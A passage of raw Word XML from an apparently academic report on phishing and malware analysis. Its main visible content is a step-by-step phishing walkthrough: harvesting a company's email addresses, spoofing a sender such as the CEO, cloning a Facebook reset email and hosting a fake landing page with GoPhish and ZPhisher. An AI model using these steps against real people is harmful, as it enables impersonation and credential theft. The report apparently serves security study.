          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> are key in staying safe online and protecting sensitive information from phishing attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB1BAE8" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00A02BD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA0ABAA"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Step 1: Understanding Domain and Email Conventions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6A5DA"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Using tools such as Hunter.io and Phonebook.cz, you can determine the domain and email conventions of the organization you are targeting. For example, we </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>entered </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="002C7722">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>https://www.perception-point.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t> and quickly determined that the email convention at the company is {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>firstname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>}.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>lastname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>}@perception-point.com. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067550E0"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Step 2: Generating Email Addresses </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC4916"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Now knowing how email addresses are structured, we can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Crosslinked. The program will look up every person associated with the organization via LinkedIn and then generate an entire list of email addresses to send a phishing email to. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357CB52C"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Step 3: Time to Go Phishing with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>GoPhish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C3F2D35"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Armed with the list of targets, now we can go phishing. We can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>GoPhish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, which is essentially a one-stop-shop for conducting a phishing campaign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB60405"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1: Linking </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>GoPhish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an SMTP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C535BE" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>SendinBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an email marketing platform for sending and automating email marketing campaigns. Unlike other email marketing platforms, which requires you to authenticate your organization’s domain, anyone can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>SendInBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> with zero authentication requirements. Within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>SendInBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, we generated the SMTP server name, and port. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AB92AA"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2: Spoofing the Sender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28265907"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Now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>GoPhish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the ability to send emails using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>SendInBlue’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMTP server. Here is where we configure who the email is “supposed” to be coming from. In this instance we are sending it “from” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Igal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>. If you want to make it look like it’s coming from the CEO of the company, all you need is their email address and put it in the “From” field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62323024"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3: Send a Test Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6DC3AC"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You can even send a test email within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>GoPhish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check your configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF87B39"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And it works! We wanted to make it look like we were sending an email from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Igal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Iytzki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, the only notable difference is that it says it’s via sendinblue.com. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9BF61A"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4: Upload the victims email list </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3D065B"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Now we can upload the entire list of email addresses that GitHub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CrossLinked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> generated. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C29B2C3"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5: Perfecting the Spoofed Brand</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BBDDA5"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Let’s say we want to harvest credentials of the targets’ Facebook accounts. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> we want to send them an email that looks like it’s coming from Facebook. By importing a legitimate email from Facebook requesting its users to reset their password, we can create a spoofing email that looks almost indistinguishable from the real thing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032F80E"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Notice the “Change Links to Landing Page,” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>GoPhish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> will automatically change all the links within the email to point to the “fake” reset password page (otherwise known as a landing page). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E630741"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After we imported the Facebook page, this is how it looks like in the email template editor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A1E1B" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">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Step 4: Creating the Phishing Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D01D551" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now we need to create the actual spoofed Facebook reset password website page. There are a few ways to do this. More advanced attackers will buy a domain that is almost the same as the legitimate site, e.g., face-book.com as opposed to facebook.com. Another way is to use a tool called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ZPhisher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">. Just press on Option 1, and it will generate the spoofed reset password page, and will also allow you to choose where you want to host it, either </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CloudFlare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C530348" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">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2.2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Proposed solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B19FA6"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In this project, we propose to leverage the power of comprehensive malware analysis techniques,   including both static and dynamic analysis, to gain a deep understanding of malware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and characteristics. By utilizing a combination of automated tools and manual analysis, we can uncover the inner workings of malware, identify its entry points, and develop effective countermeasures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34466983"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Furthermore, we aim to explore the potential of machine learning and artificial intelligence in enhancing malware detection and classification. By training models on large datasets of known malware samples, we can develop robust systems capable of accurately identifying and categorizing new and emerging malware variants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4AA800"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Through our proposed solution, we aim to contribute to the advancement of malware analysis and reverse engineering techniques, ultimately enhancing the security posture of organizations and individuals in the face of the growing threat landscape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053F3264" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="001A57EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109C662E" w14:textId="767D49DD" w:rsidR="00C24704" w:rsidRPr="002C7722" w:rsidRDefault="00C24704" w:rsidP="00C24704">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3 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">THEORETICAL </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ANALYSIS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4E49405A" w14:textId="4B3B23F0" w:rsidR="00C24704" w:rsidRPr="002C7722" w:rsidRDefault="00C24704" w:rsidP="00C24704">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3.</w:t>
      </w:r>
      <w:r w:rsidR="00DA1F4A" w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Hardware / Software Designing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503533C2" w14:textId="00295FB5" w:rsidR="00C24704" w:rsidRPr="002C7722" w:rsidRDefault="00C24704" w:rsidP="00C24704">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For the Python keylogger, the hardware requirements are minimal as it can run on any computer system. The software requirements include a Python interpreter and any additional libraries or modules used in the keylogger's implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240F78B6" w14:textId="77777777" w:rsidR="00C24704" w:rsidRPr="002C7722" w:rsidRDefault="00C24704" w:rsidP="00C24704">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Regarding the reverse engineering process using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
